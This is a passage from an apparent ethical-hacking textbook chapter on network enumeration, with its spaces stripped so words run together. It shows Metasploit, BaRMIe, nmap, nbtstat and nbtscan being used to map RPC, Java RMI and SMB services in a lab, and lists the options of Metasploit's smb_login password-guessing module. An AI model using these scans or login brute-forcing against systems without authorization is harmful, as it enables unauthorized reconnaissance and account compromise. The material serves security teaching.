misc/sunrpc_portmapper)>run[+]192.168.86.52:111-­SunRPCProgramsfor192.168.86.52=================================228 Name-­-­-­-­mountdmountdmountdmountdmountdmountdnfsnfsnfsnfs_aclnfs_aclnlockmgrnlockmgrnlockmgrnlockmgrnlockmgrnlockmgrrpcbindrpcbindrpcbindrpcbindrpcbindrpcbindChapter6  Enumeration■Number-­-­-­-­-­-­100005100005100005100005100005100005100003100003100003100227100227100021100021100021100021100021100021100000100000100000100000100000100000Version-­-­-­-­-­-­-­11223334333134134432432Port-­-­-­-­43939588014638450405490305055320492049204920492049345783457834578392973929739297111111111111111111Protocol-­-­-­-­-­-­-­-­udptcpudptcpudptcptcptcpudptcpudpudpudpudptcptcptcptcptcptcpudpudpudp[*]Scanned1of1hosts(100%complete)[*]AuxiliarymoduleexecutioncompletedAswearescanningthesamehost,it’snotunexpectedthatwe’dgetthesameresultsusingtheMetasploitmoduleaswegotfromrpcinfo.Sinceallthatishappeningisqueryingtheportmapperprocess,youcanusewhatevertoolmakesyouthemostcomfortable.Thereareacoupleofadvantagestousingthesetoolsovernmap.Thefirstisthatyou’llgettheprocessnamebycheckingwithportmapper.Thesecondisthatyouwon’tget alloftheportsusingnmapunlessyouspecificallyindicatethatyouwanttoscanallports.Therangeofportshandedoutbyportmapisn’tinthelistofwell-­knownportsthatnmapscans.RemoteMethodInvocationJavaprogramsareverypopular,especiallywhenitcomestowebapplications.Javaprovidesalotofassistancetoprogrammers,especiallywhenitcomestolibrariesandinterfacesthatcanbeimplementedwithyourownfunctionality.JavaincludesitsowncapabilityforremoteRemoteProcedureCalls 229procedurecalls,thoughinJavait’scalledremotemethodinvocation.TohaveaprogramthatusesRMI,thesystemneedsaversionoftheportmapperforJavacalledthermiregistry.TheprogramusingRMIregistersitselfwiththermiregistryprogram.Thismeansthatanyonecancheckwiththermiregistrytoseewhatservicesareoffered.Thermiregistryprogramwillrespondinasimilarwaytowhatwesawwhenwecheckedwiththeportmapper.It’ssaidthatRMIistheobject-­orientedversionofRPC.Thismeansobjectsgetpassedbetweentheserverandtheclient.Theclientimplementsastubthroughaninterface.Aninterfaceisanobject-­orientedtermindicatingadefinitionofaclass.Thestubcommunicateswithaskeletonontheserver.WhenaprogrammeriscreatingaprogramthatusesRMI,theyuseanRMIcompiler(theprogramrmic).TheprogramsweusetoconnecttoanRMIregistrytoenumerateservicesthatareregistereddon’tneedtoknowthespecificinterfacesneededtopassobjectsbetweentheskeletonandthestubbecausetheonlythingtheenumerationisdoingisidentifyingtheskeletonsorservicesontheremotesystem.We’llstartwithMetasploittorunascanonasystemthathasRMI.YoucanseeanexampleofusingMetasploitforRMIenumerationhere.RunningRMIScannerin Metasploitmsf>useauxiliary/gather/java_rmi_registrymsfauxiliary(gather/java_rmi_registry)>showoptionsModuleoptions(auxiliary/gather/java_rmi_registry):Name-­-­-­-­RHOSTRPORTCurrentSetting-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­1099Required-­-­-­-­-­-­-­-­yesyesDescription-­-­-­-­-­-­-­-­-­-­-­ThetargetaddressThetargetport(TCP)msfauxiliary(gather/java_rmi_registry)>setRHOST192.168.86.62RHOST=>192.168.86.62msfauxiliary(gather/java_rmi_registry)>run[*]192.168.86.62:1099-­SendingRMIHeader...[*]192.168.86.62:1099-­ListingnamesintheRegistry...[+]192.168.86.62:1099-­1namesfoundintheRegistry[+]192.168.86.62:1099-­NameHelloServer(HelloImpl_Stub)foundon127.0.1.1:38371[*]AuxiliarymoduleexecutioncompletedTheoptionsrequiredtorunthejava_rmi_registrymodulearesimple.Theremoteportdefaultsto1099,whichistheportrmiregistrylistenson.Ifyouthinkthereisanotherportlistening,youcansettheRPORTvariable.Theonethatisessential,though,isRHOST.WesetthisvariabletotheIPaddressofthesystemwherethereisasimpleJava230 Chapter6  Enumeration■programthatimplementsanRMIserver.Youcanseetheresultofthescan.AccordingtotheRMIregistry,thereisaservernamedHelloServer.IteventellsusthatthatthestubisnamedHelloImpl.Eventhoughit’saserver,theregistrycallsitastubbecausethedifferencebetweenastubandaskeletonistheendoftheconversationthat’shappening.Thermicgeneratesstubsforbothserversandclients.It’sjustthatreferringtotheserverendasaskeletondifferentiatesbetweenthetwo.MetasploitisnottheonlywayyoucanscanforRMIservices.Ifyoulookaroundalittle,youcanfindadditionalprograms.OneoftheseiscalledBarmie,stylizedasBaRMIetohighlighttheRMIinthename.YoucangrabthesourcecodeaswellasaprecompiledimplementationofBaRMIethroughGitHub.Runningtheprogramisstraightforward.Sinceit’saJavaprogram,youhavetoruntheintermediatecodefilethroughtheJavaprogramusedtocreateaJavavirtualmachine.Sinceit’sstoredasaJavaarchive(JAR),youhavetotellJavathatitisgoingtoberunningfromoneofthose.Theprogramdoesneedtoknowwhathostit’sscanning,soyoupassintheIPaddressofyourtarget.YoucanseearunofBaRMIenext.TheprogramjavacisusedtocompileJavasourcecodetoanintermediatecodefile.Theprogramjavaisusedtoexecuteanintermediatecodefile.UsingBaRMIe[email protected]:~#java-­jarBaRMIe_v1.01.jar192.168.86.62||||| v1.0JavaRMIenumerationtool.WrittenbyNickyBloor(@NickstaDB)Warning:BaRMIewaswrittentoaidsecurityprofessionalsinidentifyingtheinsecureuseofRMIservicesonsystemswhichtheuserhaspriorpermissiontoattack.BaRMIemustbeusedinaccordancewithallrelevantlaws.Failuretodosocouldleadtoyourprosecution.Thedevelopersassumenoliabilityandarenotresponsibleforanymisuseordamagecausedbythisprogram.RemoteProcedureCalls 231Scanning1target(s)forobjectsexposedviaanRMIregistry...[-­]AnexceptionoccurredduringthePassThroughProxyThreadmainloop.java.net.SocketException:Socketclosed[-­]AnexceptionoccurredduringtheReplyDataCapturingProxyThreadmainloop.java.net.SocketException:SocketclosedRMIRegistryat192.168.86.62:1099Objectsexposed:1Object1Name:HelloServerEndpoint:127.0.1.1:38371[+]Objectisboundtolocalhost,butappearstobeexposedremotely.Classes:3Class1Classname:java.rmi.server.RemoteStubClass2Classname:java.rmi.server.RemoteObjectClass3Classname:HelloImpl_Stub1potentialattacksidentified(+++=morereliable)[-­-­-­]JavaRMIregistryillegalbinddeserialization0deserializationgadgetsfoundonleakedCLASSPATH[~]GadgetsmaystillbepresentdespiteCLASSPATHnotbeingleakedSuccessfullyscanned1target(s)forobjectsexposedviaRMI.Weseeacoupleofthingsfromrunningthisprogram.It’salittlemoreverbosethanMetasploitis.Wegetthenameoftheserver,HelloServer.JustaswithMetasploit,weseethattheserverisboundtothelocalhostonport38371,whichwasdynamicallyallocatedbythermiregistry.Wealsoseetheinheritancetreefromthis.Wecanseereferencestotheclassesjava.rmi.server.RemoteStub,java.rmi.server.RemoteObject,andHelloImpl.Stub.AccordingtoBaRMIe,theserviceisexposedremotelybutisonlyavailabletolocalhost.Thismeanswehaveinformationleakage.ToattempttoidentifyvulnerabilitieswiththatRMIserverandpotentiallyexploitthosevulnerabilities,weneedtogainaccesstothesystem.InidentifyingtheRMIregistryandtheadditionalservices,wehavealsoidentifiedtheexistenceofanotherpieceofsoftwareonthetargetsystem.ItmayseemobviousnowbutifyoufindanRMIregistryandRMIservices,youhavefoundasystemthatatleasthasaJavaruntimeengine(JRE)onit,ifnotaJavadevelopmentkit(JDK).Whatwedon’tknowfrom232 Chapter6  Enumeration■theoutputhereistheversionoftheJREorJDK.However,therehavebeenvulnerabilitiesinJavaimplementationsoverthelastfewyears.KnowingthereisatleastaJREonthesystemmayhavegivenyoualeadtovulnerabilities.ServerMessageBlockThemostcommonimplementationofremoteprocedurecallsyouwillrunacrossistheoneusedinWindowsnetworks.TheSMBprotocoliscomplexwhenyouconsiderallthedifferentwaysitcanbeusedandallthedifferentwaysitwilloperate.YoumaybemostfamiliarwithSMBastheprotocolusedtosharefilesacrossanetwork.WhilethisisdefinitelyoneuseforSMB,itisnottheonlyone,andevenwhenyouthinkaboutsharingfiles,thereisalotmorethanjusttransmittingfilecontentsacrossanetwork.SMBisanApplicationlayerprotocolthatcanoperateoverdifferentprotocolsatlowerlayers.First,itcanoperatedirectlyoverTCPwithoutanyotherSessionlayerprotocols.IfasystemwererunningSMBdirectlyoverTCP,youwouldfindTCPport445tobeopen.SMBcanalsooperateoversessionprotocolslikeNetBIOS,whichisanapplicationprogramminginterface(API)developedbyIBMtoextendtheinput/output(I/O)capabilitiesawayfromthelocalsystemandontothenetwork.IfyouseeUDPports137and138open,youwillknowthatyouhavefoundSMBrunningontopofNetBIOS.However,ifyoufindTCPports137and139open,youwillhavefoundSMBrunningonNetBIOSoverTCP.KeepinmindthatNetBIOSisusedfornameservicesinthiscase.So,justwhatisSMBgoodfor?SMBisusedforcommunicatingbetweenWindowssystems—­filesharing,networkmanagement,systemadministration.Thismaymeanmanagingnamingofsystemstobecertaintherearen’tconflicts.Managementlikethisrequiresthatsystemsannouncethemselvestothelocalnetwork.SMBalsohastosupportauthenticationsosystemsaren’twideopentotheentirenetwork.ThismeansSMBknowsaboutusersandgroups.Italsoknowsaboutshares,whicharedirectoriesthatareexposedtothenetwork.Systemshavetobeabletoprovidethelistofsharestheyareexportingtothenetworktosystemsthatask.Thisallowsausertogetalistofsharesandthenaccesstheonestheywant,afterauthentication.Authenticationisnotalwaysnecessary.SMBsupportssomethingcallednullauthentication.Whatthismeansistherearesomefunctionsthatdon’trequireausernameandpassword.Asystemcanrequestinformationaboutanothersystemonthenetworkusingnullauthentication,meaningnocredentialswerepassed.Thisnullauthenticationcanallowustogatheralotofinformationaboutthesystem.WecanuseseveraldifferenttoolstoenumerateinformationonWindowssystems.Actually,it’snotevenjustWindowssystems,thoughtheintentofimplementingSMBonothersystemsistointeroperatewithWindowssystems.SambaisapackagethatcanbeinstalledonUnix-­likeoperatingsystems,providingSMBaswellasaNetBIOSnamingservice.TherearetwoseparateprocessesthatareusedbySamba.Oneissmbd,whichhandlesSMB,andthereisalsonmbd,whichhandlesthenamingaspectsofinteroperatingwithWindowsServerMessageBlock 233systems.ThismeansthatevenwhilewearelookingtoenumerateinformationfromWindowssystems,wecanalsoscoopupUnix-­likesystems.Thefirstplacetostartisusingbuilt-­intools.Built-­intoolsareespeciallyavailableonWindowssystems,butthereareUnix-­likeutilitiesaswell.Wewillalsolookatanumberofpluginsavailablefornmaptogatherinformation.Metasploit,notsurprisingly,hasseveralmodulesforscanningSMBsystems.Therearealsosomeotherutilitiesyoucanuse,andwe’lltakealookatsomeofthose.Built-­inUtilitiesIfyouareonaWindowssystem,thereareanumberofutilitiesthatyoucanmakeuseoftogatherinformationusingSMB.AnalogsexistforLinuxaswell.Onethingtomakenoteofwithregardtothebuilt-­inutilitiesisthatyouneedtobeonthesamebroadcastdomaintomakeuseofthem.NetBIOSwasoriginallydevelopedtobeusedinalocalareanetwork,ratherthanwiththeconceptofwideareanetworksbuiltin.Asaresult,someofthefunctionsworkbecausesystemsrelyonbroadcastinginformationtothenetwork.Theimplicationofthisisthatyouneedtohaveapresenceonthelocalnetworkbeforetheseutilitieswillwork.GatheringNetBIOSstatisticscanbeaccomplishedbyusingtheprogramnbtstat.Thisallowsyoutogatherdataaboutthelocalnetwork.Inthefollowingexample,youcanseetheuseofnbtstattoacquiredataaboutaremotesystem.Usingnbtstat-­apresentsthenametableforthehostnameprovided.IfallweknewwastheIPaddressoftheremotesystem,wecouldusenbtstat-­Ainstead.Whatyou’llseeisthatwegetdifferentpiecesofinformation.Yougetalistofnamesdowntheleftside,followedbyacode.Thecodeindicatesthecontextinwhichthenameexists,followedbythestatusofeachname.nbtstatOutputC:\Users\kilroy>nbtstat-­abillthecatLocalAreaConnection:NodeIpAddress:[192.168.86.50]ScopeId:[]NetBIOSRemoteMachineNameTableNameTypeStatus-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­BILLTHECATUNIQUERegisteredBILLTHECATUNIQUERegisteredWORKGROUPGROUPRegisteredMACAddress=AC-­87-­A3-­36-­D6-­AA234 Chapter6  Enumeration■ThecodesshownarefromNetBIOS,andyoucanlookupthecodetodeterminewhatthenameisassociatedwith.SystemsthatuseSMBhaveanumberofcontextsinwhichtheycanexist.Whatyouseehereisasystemthatisbothaworkstationandafileserver.Thismeansthatfilesharinghasbeenenabledonthissystem.Additionally,though,thesystemactsasaworkstationorclientonthenetwork.It’simportanttodistinguishthecapabilitiesbecausetheneachsystemcanknowthetypesofquestionsthatcanbeaskedofeachoftheothersystems.Intechnicalterms,eachsetoffunctionalityhasproceduresassociatedwithit.Wecan’tcallproceduresthatdon’texist,sobeforeproceduresarecalledontheremotesystemstoinitiateanaction,wehavetoknowwhatproceduresareavailable.nbtstat-­aessentiallyprovidesthatinformation.Whatwe’veseensofarsimplyasksforallthefunctions(names)associatedwithahostnameonthenetwork.That’soneindividualsystem.IfwewanttoseeallthehostnamesthataretalkingSMB/NetBIOS,weneedtoaskforsomethingelse.Wecanstillusenbtstat,wejustpassadifferentparameterinonthecommandline.Wearelookingforresolvednames.Thislistcancomefrombroadcastmessageswhenthereisnocentralizeddatabasefornamelookups—­systemsannouncetheirnamesandtheirpresencewhentheycomeonlineandthenperiodicallyafterthat.ItcanalsocomefromtheWindowsInternetNameServer(WINS),whichisacentralrepositoryofnamesofsystemsonanenterprisenetwork.WindowsserverswillhaveWINSfunctionality,sosystemsregisterwiththeWINSandallnamescanberesolved.Inthefollowingcodelisting,youcanseealistofnamesonthenetwork.SincethereisnoWindowsserverand,asaresult,noWINSonthenetwork,theseareallnamesthathavebeenidentifiedthroughbroadcastmessages.ThesesystemsareallmacOS,buttheyaresharingfilesonthenetworkusingSMB.Todothat,theyneedtobehavelikeanyothersystemthatcommunicatesusingSMB.ListingResolvedNameswith nbtstatC:\Users\kilroy>nbtstat-­rNetBIOSNamesResolutionandRegistrationStatistics-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­ResolvedByBroadcastResolvedByNameServer=47=0RegisteredByBroadcast=8RegisteredByNameServer=0NetBIOSNamesResolvedByBroadcast-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­YAZPISTACHIOBILLTHECATServerMessageBlock YAZPISTACHIOYAZPISTACHIOLOLAGRANOLALOLAGRANOLAYAZPISTACHIOYAZPISTACHIO235Thereareotherfunctionsthatnbtstatoffers,buttheyaremorerelatedtofunctionalityofthelocalsystemandlessrelevantforenumeration.Whilenbtstathasalotoffunctionality,itis,asnotedearlier,onlyonWindowssystems.Thereareothertoolsyoucanuseifyouaren’trunningonWindows.IfyouhaveaLinuxsystemandhavetheSambapackageinstalled,whichprovidesservicesthatallowLinuxtocommunicateusingSMB,youcanmakeuseofthetoolnmblookup.Thiscanbeusedtodolookupsofnamesonthenetwork.ItcanbeusedtoqueryWINSaswellaslookupnameswherethesystemsarejustbroadcastingtheirinformation.Forexample,togetthedetailsaboutthesystembillthecataswedidearlier,youwouldusenmblookup-­S-­Rbillthecat,asyoucanseehere.nmblookupfor Enumeration[email protected]$nmblookup-­S-­B192.168.86.255billthecatCan'tload/etc/samba/smb.conf-­runtestparmtodebugitqueryingbillthecaton192.168.86.255192.168.86.32billthecatLookingupstatusof192.168.86.32BILLTHECAT-­HBILLTHECAT-­HWORKGROUP-­H MACAddress=AC-­87-­A3-­36-­D6-­AAUsing-­Btellsnmblookuptousethebroadcastaddressthatissupplied,whichisjustthebroadcastaddressonthelocalnetwork.TouseWINS,youcoulduse-­Rtodoarecursivelookuponthename.Theflag-­Stellsnmblookuptogetanodestatusinadditiontojustthenamestatus.Thisistheflagthatprovidesuswiththeotheruses.Justaswedidearlier,wecanseethatwehaveaworkstation()andalsoafileserver().You’llalsoseefromthisoutput,justaswedidearlier,thatthesystembelongstotheworkgroupWORKGROUP.WorkgroupsareusedforadhocWindowsnetworkswherethereisnodomaincontrollertomanageallofthesystems.Usingthe netUtilityOneprogramthat’sbuiltintoWindowsisthenetutility.Thisiswidelyusedforseveralpurposes.Ifyouwantedtoconnecttoashareddriveonthenetwork,youwouldusenetusetoconnecttothatshareddrive.ThenetcommandallowsyoutoquerythenetworkusingSMBmessages.Asanexample,theoutputthatfollowsshowsstatisticsfromtheworkstation236 Chapter6  Enumeration■serviceonaWindowsserver.Thisshowsinformationaboutnetworkcommunicationprimarily,includingbytestransferred.Itcanalsoshowyouthenumberofsessionsthathavebeenstartedandthesessionsthathavefailed.PSC:\Users\kilroy>netstatisticsworkstationWorkstationStatisticsfor\\SERVER2020Statisticssince1/1/20216:08:25PMBytesreceivedServerMessageBlocks(SMBs)receivedBytestransmittedServerMessageBlocks(SMBs)transmittedReadoperationsWriteoperationsRawreadsdeniedRawwritesdenied29948188561508101180000NetworkerrorsConnectionsmadeReconnectionsmadeServerdisconnects0000SessionsstartedHungsessionsFailedsessionsFailedoperationsUsecountFailedusecount00006870Thecommandcompletedsuccessfully.Additionally,youcanextractinformationabouttheconfigurationforthesystem,whichwillincludethecomputername,thesoftwareversion,andthedomainthecomputerhasbeenjoinedto.Onedownsidetothisutility,though,isyouneedtobeonthelocalnetworkandprobablyhavetobejoinedtothedomain.Thisispossibleifyouhavealreadycompromisedasystemandarelookingtopivottoanothersystemonthenetwork.ServerMessageBlock 237nmapScriptsnmapcontinuestoberelevanttous,eventhoughwe’vemovedbeyondtheportscanningphase.Here,wearelookingtogathermoreinformationusingthescriptsthatareprovided.Atthetimeofthiswriting,thereare35SMB-­relatedscriptsincludedintheimplementationofnmaponthelatestversionofKaliLinux.Next,youcanseeaportionoftheoutputfromthatscript.Thenameofthescript,smb-­os-­discovery,isshownintheoutput.ThisisaWindowssystemthathasbeensetupforsharing.You’llseethatnmaphasidentifieditveryspecifically,downtotheservicepackthathasbeeninstalled.Interestingly,thereareseveralothersystemsonthenetworkwhereSMB-­basedsharingisenabled,butnoneofthemgetidentified.Thebigdifferencebetweenthoseandthisoneisthatthosesystemsonlyhaveport445open,whilethisonealsohasports135and139open.smb-­os-­discoveryScanOutputNmapscanreportforstevedallas.lan(192.168.86.50)Hostisup(0.00058slatency).PORTSTATESERVICE135/tcpopenmsrpc139/tcpopennetbios-­ssn445/tcpopenmicrosoft-­dsMACAddress:46:5E:C8:0A:B7:D1(Unknown)Hostscriptresults:|smb-­os-­discovery:|OS:Windows7Professional7601ServicePack1(Windows7Professional6.1)|OSCPE:cpe:/o:microsoft:windows_7::sp1:professional|Computername:stevedallas|NetBIOScomputername:STEVEDALLAS\x00|Workgroup:WORKGROUP\x00|_Systemtime:2021-­01-­04T20:30:27-­06:00Thereareseveralimportantpiecesofinformationwecanusenmaptolookfor.Thereareenumerationscriptsforusers,groups,services,processes,andshares.Someoftheserequireauthenticationbeforetheremotesystemwillgiveanythingup.MicrosoftbegandisablingnullsessionauthenticationinWindowsServer2008R2andWindows7.Anyoperatingsystemafterthatwillrequireauthenticationbeforeaccessingtheinterprocesscommunicationneededtoextracttheinformationrequested.However,thesettingcanbedisabled,andyouneverknowwhenyouwillrunacrossveryoutdatedormisconfiguredsystems.Youcanseethefailureoftheshareenumerationscriptinnmaphere.Thelistingshowsthateventhoughauthenticationwasrequired,itstillattemptedcommonsharenames.238 Chapter6  Enumeration■EnumeratingShareswith NmapNmapscanreportforstevedallas.lan(192.168.86.50)Hostisup(0.00040slatency).PORTSTATESERVICE135/tcpopenmsrpc139/tcpopennetbios-­ssn445/tcpopenmicrosoft-­dsMACAddress:46:5E:C8:0A:B7:D1(Unknown)Hostscriptresults:|smb-­enum-­shares:|note:ERROR:Enumeratingshares(NT_STATUS_ACCESS_DENIED)|account_used:|\\192.168.86.50\ADMIN$:|warning:Couldn'tgetdetailsNT_STATUS_ACCESS_DENIED|Anonymousaccess:|\\192.168.86.50\C$:|warning:Couldn'tgetdetailsNT_STATUS_ACCESS_DENIED|Anonymousaccess:|\\192.168.86.50\IPC$:|warning:Couldn'tgetdetailsNT_STATUS_ACCESS_DENIED|Anonymousaccess:READ|\\192.168.86.50\USERS:|warning:Couldn'tgetdetailsNT_STATUS_ACCESS_DENIED|_Anonymousaccess:failed,guessingatcommononesforshare:forshare:forshare:forshare:OneofthecommonsharenamestriedisIPC$.Thisisasharenameallowingaccesstosharedpipes,whichisamethodforinterprocesscommunications.AnothersharenamenmapcheckedforisC$.Thisisanadministrativesharethatiscreated.Again,olderversionsofWindowswillalloweasieraccesstothisshare,butsinceWindowsXP,therehavebeenmorerestrictionsontheuseofthisshare.Itdoesenableadministratorstofunctionremotely,butaccessingitrequiresmorethanjustlogincredentials.Thelogincredentialshavetobeforanadministrator.WhilenmapdoeshaveotherscriptsthatcanbeusedagainstsystemsrunningSMB,mostofthemarenotforenumeration.Manyofthemarespecifictovulnerabilityidentificationorconfirmation.Sincewearefocusingonenumeration,wecanputofflookingatthoseotherscriptsuntilalatertime.ServerMessageBlock 239NetBIOSEnumeratorAnopensourcetoolthatwillfunctionlikenmapinthesensethatitwillscanasystemtoidentifysystemsthatspeakSMBbeforeprobingthemisNetBIOSEnumerator.Thisisagraphicaltool,whichmakesiteasiertolocateinformationmorequicklyabouteachsystemanditscapabilities.Figure 6.1showstheoutputfromascanofanetwork.Intheoutputyouwillseenotonlysystems,includingtheirnameandIPaddress,butalsoanyworkgroupordomainthatexistsonthenetwork.FIGURE 6.1 NetBIOSEnumeratorWhenrunningNetBIOSEnumerator,youprovidearangeofIPaddresses,anditwillstartscanningthenetwork.OnceitidentifiesasystemthatsupportsSMB,itstartstoquerythesystemtogetasmuchinformationasitcanget.Oneitemthatismissingfromtheoutputforeachofthehostsfoundistheusernameofthepersonloggedin.Thereasontheusernameismissingisthisisanunauthenticatedscan.Theprogramhasnotdoneanyauthenticationagainsttheremotesystem,sothereissomeinformationthatwon’tbeavailable.SMBisabitofapromiscuousprotocolinthesensethatitwillprovidealotofinformation,butitonlyprovidesenoughinformationforremoteservicestowork.Itdoesn’tprovideeverythingyoucanpotentiallyaskforunlessyouhaveauthenticated.240 Chapter6  Enumeration■MetasploitMetasploithasmodulesforjustabouteveryaspectofethicalhacking.Itcanbeusedinsomanydifferentways.Asshownearlier,wecandefinitelyuseitforenumeration,andwhenitcomestoSMB,thereareseveralthatyoucanrun.Asanexample,wecanlookforSMBversionsacrossthenetwork.Inthefollowinglisting,youwillseearunofthesmb_versionmodule.YoushouldgetanideaoftheversionoftheSMBservicethat’srunning.Whatyoucanseearetwosystemsthathavebeenidentifiedwiththeoperatingsystemversionlisted.Fromthatinformation,youcanidentifytheversionofSMBthat’ssupported.TheWindowsXPsystemisrunningSMBversion1becauseversion2didn’tcomeoutuntilWindowsVistawasreleased.AccordingtotheSMBversionhistory,theWindows7systemwouldbeusingSMBversion2.1.Whileitlookslikethismaybeanoutdatedscan,havingoldsystemsaroundisusefulforpracticingattackson,sincetheyaremorelikelytohavevulnerableversionsofsoftware.SMBVersionScanwith Metasploitmsfauxiliary(scanner/smb/smb_version)>run[*]Scanned26of256hosts(10%complete)[*]192.168.86.26:445-­Hostcouldnotbeidentified:[*]192.168.86.27:445-­Hostcouldnotbeidentified:[*]192.168.86.32:445-­Hostcouldnotbeidentified:[*]192.168.86.41:445-­Hostcouldnotbeidentified:[+]192.168.86.49:445-­HostisrunningWindowsXPSP2(language:English)(name:OPUS-­C765F2)(workgroup:WORKGROUP[+]192.168.86.50:445-­HostisrunningWindows7ProfessionalSP1(build:7601)(name:STEVEDALLAS)(workgroup:WORKGROUP)[*]Scanned52of256hosts(20%complete)[*]192.168.86.61:445-­Hostcouldnotbeidentified:()()()())()WecanalsouseMetasploittoenumerateusers.Todothat,youwouldusethesmb_enumusers_domainmodule.Ifyouknowone,youcanuseausernameandpassword.Thiswouldallowthemoduletoauthenticateagainstthesystemtoobtainadditionalusers.Thisisnotrequired,thoughyou’remuchlesslikelytogetalistofuserswithoutauthenticationofsomesort.Fortunately,thereisanothermoduleyoucanusetohelpyougetatleastoneusernameandpassword.Thesmb_loginmodulecanbeusedtoattemptusername/passwordcombinations.Hereyoucanseethelistofoptionsforthesmb_loginmodule.smb_loginModuleOptionsModuleoptions(auxiliary/scanner/smb/smb_login):Name-­-­-­-­CurrentSetting-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­Required-­-­-­-­-­-­-­-­Description-­-­-­-­-­-­-­-­-­-­-­ServerMessageBlock ABORT_ON_LOCKOUTfalseyesAborttherunwhenanaccountlockoutisdetectedBLANK_PASSWORDSfalsenoTryblankpasswordsforallusersBRUTEFORCE_SPEED5yesHowfasttobruteforce,from0to5DB_ALL_CREDSfalsenoTryeachuser/passwordcouplestoredinthecurrentdatabaseDB_ALL_PASSfalsenoAddallpasswordsinthecurrentdatabasetothelistDB_ALL_USERSfalsenoAddallusersinthecurrentdatabasetothelistDETECT_ANY_AUTHfalsenoEnabledetectionofsystemsacceptinganyauthenticationDETECT_ANY_DOMAINfalsenoDetectifdomainisrequiredforthespecifieduserPASS_FILEnoFilecontainingpasswords,oneperlinePRESERVE_DOMAINStruenoRespectausernamethatcontainsadomainname.ProxiesnoAproxychainofformattype:host:port[,type:host:port][...]RECORD_GUESTfalsenoRecordguestprivilegedrandomloginstothedatabase­RHOSTSyesThetargetaddressrangeorCIDRidentifierRPORT445yesTheSMBserviceport(TCP)SMBDomain.noTheWindowsdomaintouseforauthenticationSMBPassnoThepasswordforthespecifiedusernameSMBUsernoTheusernametoauthenticateasSTOP_ON_SUCCESSfalseyesStopguessingwhenacredentialworksforahostTHREADS1yesThenumberofconcurrentthreadsUSERPASS_FILEnoFilecontainingusersandpasswordsseparatedbyspace,onepairperlineUSER_AS_PASSfalsenoTrytheusernameasthepasswordforallusersUSER_FILEnoFilecontainingusernames,oneperlineVERBOSEtrueyesWhethertoprintoutputforallattempts241242 Chapter6  Enumeration■Usingthesmb_loginmodule,youcanprovidefilesthatcontainusernamesandpasswords.Themodulewilltrytoauthenticateusingtheusernameandpasswordcombinations.Onethingyouwillalsoseeisthatyoucantellthemoduletotrytheusernameasapassword.Thisiscommonlydisallowedbypasswordpolicies,butyoumayrunacrosssystemswherepasswordpoliciesaren’tinplace,makingitpossiblefortheusernameandpasswordtobethesame.Aswithnmap,MetasploithasmultiplemodulesthatcanbeusedagainstSMBsystems.Manyofthemarerelatedtoidentifyingvulnerabilities.Itdoesprovideanothertoolthatyoucanusetogatherinformation,andtheadvantagetousingMetasploitisthatit’sbackedupwithadatabasewhereinformationisstored.Youcanretrievehostdata,services,andotherdetailsaboutthetargetfromthedatabase.Thismakesitagoodrecordkeepingtoolaswellasatoolthatcanbeusedforenumerationandotherformsofscanning.OtherUtilitiesConsideringthenumberofdevicesthatuseSMBfornetworking,it’snotsurprisingthattherearemanytoolsavailableforenumeratingSMBsystems.Theprogramnbtscanisoneofthose.Itprovidesdetailsaboutsystemsitfindsonthelocalnetwork,includingtheNetBIOSname,user,MACaddress,andIPaddress.Inthefollowinglisting,youcanseetheoutputofscanningmyhomenetwork,identifyingeverysystemthathasWindowssharesavailable.Thescanrangehasbeenprovidedonthecommandlinehere,butyoucanalsoprovidetheIPaddressesinafile.Scanninga Networkwith nbtscan[email protected]:~#nbtscan192.168.86.0/24DoingNBTnamescanforaddressesfrom192.168.86.0/24IPaddressNetBIOSNameServerUserMACaddress-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­192.168.86.0   Sendtofailed:Permissiondenied192.168.86.44NPI11065400:00:00:00:00:00192.168.86.52BOBBIEBOBBIE00:00:00:00:00:00192.168.86.49OPUS-­C765F200:50:56:3b:ac:3e192.168.86.170MILOBLOOMac:87:a3:1e:6b:30192.168.86.50STEVEDALLAS46:5e:c8:0a:b7:d1192.168.86.26YAZPISTACHIOf0:18:98:0c:34:69ServerMessageBlock 243192.168.86.61MILOBLOOMac:87:a3:1e:6b:30192.168.86.32BILLTHECATac:87:a3:36:d6:aa192.168.86.27BINKLEY8c:85:90:5a:7e:f2192.168.86.255Sendtofailed:PermissiondeniedGettingtheoutputhere,justaswithanytool,ishelpful,butatsomepointyouneedtodosomethingwiththeinformation,notleastputtingitintoareportforyourclientoremployer.Onenicethingaboutnbtscanistheabilitytogenerateoutputthatcanbemanipulatedprogrammatically.Thismayincludetakingtheoutputandputtingitintoadatabase.Whileyoucancertainlyreadinvalueswithwhitespaceseparators,nbtscanletsyouspecifyaseparatorthatmaymakeiteasiertoreadintheoutput,butyoucanalsospecifyacommaasaseparatorandthenopentheoutputinaspreadsheetprogram.Adding-­sfollowedbywhatevercharacteryouwanttouseasaseparatorwillgetyouthesameoutputasshownearlier,justwithyourspecifiedseparatorincludedbetweenthedifferentfields.YoumaystarttoseeabitofapatternwhenitcomestoenumerationandSMB.Whiletherearealotoftoolsavailable,theyallperformthesamefunctions,andtheeasiestthingtodowhenitcomestoenumerationistoidentifysystemsthatuseSMB,includingthenametheyadvertiseonthenetwork.Onenoteaboutthatname:itmaynotresolvetoanIPaddress.AnameannouncedusingNetBIOSisintendedtobeusedandresolvedonthelocalnetwork.Thismeansitwon’tresolveusingDNSunlessDNSisconfiguredtousethesamenamesandIPaddresses.It’spossibletohaveonenameforyourWindowssharingandanotheroneforyourDNS,assumingthesystemevenhasaDNSaddress.IfyourenterprisenetworkusesWINS,theywillresolvetobethesamebecauseofhowthelocalsystemsregistertoWINS.Anothertool,andwe’llseethesamecapabilitieswiththisone,isenum4linux.ThefollowingexampleisbeingrunfromaKaliLinuxsystemwhereitisinstalledby